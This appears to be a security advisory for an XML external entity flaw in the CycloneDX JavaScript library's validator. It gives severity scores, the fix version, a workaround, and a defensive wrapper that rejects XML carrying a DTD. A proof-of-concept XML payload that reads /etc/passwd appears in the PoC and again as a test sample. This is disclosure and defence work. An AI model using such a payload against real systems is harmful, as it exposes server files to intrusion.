CVSS3
Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence: Low
EPSS Percentile: 18.1%
XML external entity (XXE) injection could be possible when running the provided XML validator on arbitrary input.
```javascript
const {
  Spec: { Version },
  Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');

const version = Version.v1dot5;
const validator = new XmlValidator(version);

// Proof-of-concept document: the DTD declares an external entity that the
// vulnerable validator would resolve while parsing.
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components>
    <component type="library">
      <name>testing</name>
      <version>1.337</version>
      <licenses>
        <license>
          <id>&xxe;</id>
        </license>
      </licenses>
    </component>
  </components>
</bom>`;

// Validating this forged input might lead to unintended behaviour,
// because the XML external entity would be resolved.
validator.validate(input).then(ve => {
  console.error('validation error', ve);
});
```
This issue was fixed in @cyclonedx/[email protected].

Do not run the provided XML validator on untrusted inputs.
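A caller-side guard for that workaround, added here as an example and not code from the advisory or the CycloneDX project: it refuses to forward XML that carries a DTD (the channel the payload above relies on) to the validator at all. The functions `inspectXmlForDtd` and `validateUntrusted`, the sample documents and the stand-in `recordingValidator` are constructed for this example; the validator object is injected so the code runs without the library installed.

```javascript
// Remove comments and processing instructions: they may legitimately contain the
// literal text "<!DOCTYPE" without declaring a DTD.
function stripCommentsAndPIs(xml) {
  return xml.replace(/<!--[\s\S]*?-->/g, '').replace(/<\?[\s\S]*?\?>/g, '');
}

// A DOCTYPE is only permitted in the prolog, i.e. before the root element's
// start tag, so only that part of the document is inspected.
function inspectXmlForDtd(xml) {
  const text = stripCommentsAndPIs(xml);
  const rootStart = text.search(/<[A-Za-z_:]/);
  const prolog = rootStart === -1 ? text : text.slice(0, rootStart);
  const doctype = prolog.match(/<!DOCTYPE\b[\s\S]*?(\[[\s\S]*?\]\s*)?>/i);
  if (!doctype) return { hasDtd: false };
  const decl = doctype[0];
  return {
    hasDtd: true,
    externalSubset: /^<!DOCTYPE\s+\S+\s+(SYSTEM|PUBLIC)\b/i.test(decl),
    externalEntity: /<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b/i.test(decl),
    parameterEntity: /<!ENTITY\s+%/.test(decl),
  };
}

// Defence-in-depth wrapper around any object exposing validate(xml) -> Promise:
// untrusted documents carrying a DTD are refused before the validator parses them.
async function validateUntrusted(xml, validator) {
  const dtd = inspectXmlForDtd(xml);
  if (dtd.hasDtd) {
    return { rejected: true, reason: 'DTD present in untrusted input', dtd };
  }
  return { rejected: false, result: await validator.validate(xml) };
}

// Constructed sample inputs: the advisory's XXE payload, and a benign BOM whose
// comment mentions DOCTYPE without declaring one.
const XXE_BOM = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5"><components/></bom>`;
const PLAIN_BOM = `<?xml version="1.0"?>
<!-- a "<!DOCTYPE" inside a comment is not a declaration -->
<bom xmlns="http://cyclonedx.org/schema/bom/1.5"><components/></bom>`;

// Stand-in for the library's XmlValidator: records what reaches it, resolves null.
const recordingValidator = { seen: [], validate(x) { this.seen.push(x); return Promise.resolve(null); } };
```

With the real library, pass `new XmlValidator(Version.v1dot5)` as the validator; the guard rejects the payload before `validate` is ever called, and it stays useful as a second layer even on a fixed version.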
github.com/CycloneDX/cyclonedx-javascript-library
github.com/CycloneDX/cyclonedx-javascript-library/commit/5e5e1e0b9422f47d2de81c7c4064b803a01e7203
github.com/CycloneDX/cyclonedx-javascript-library/pull/1063
github.com/CycloneDX/cyclonedx-javascript-library/security/advisories/GHSA-38gf-rh2w-gmj7
nvd.nist.gov/vuln/detail/CVE-2024-34345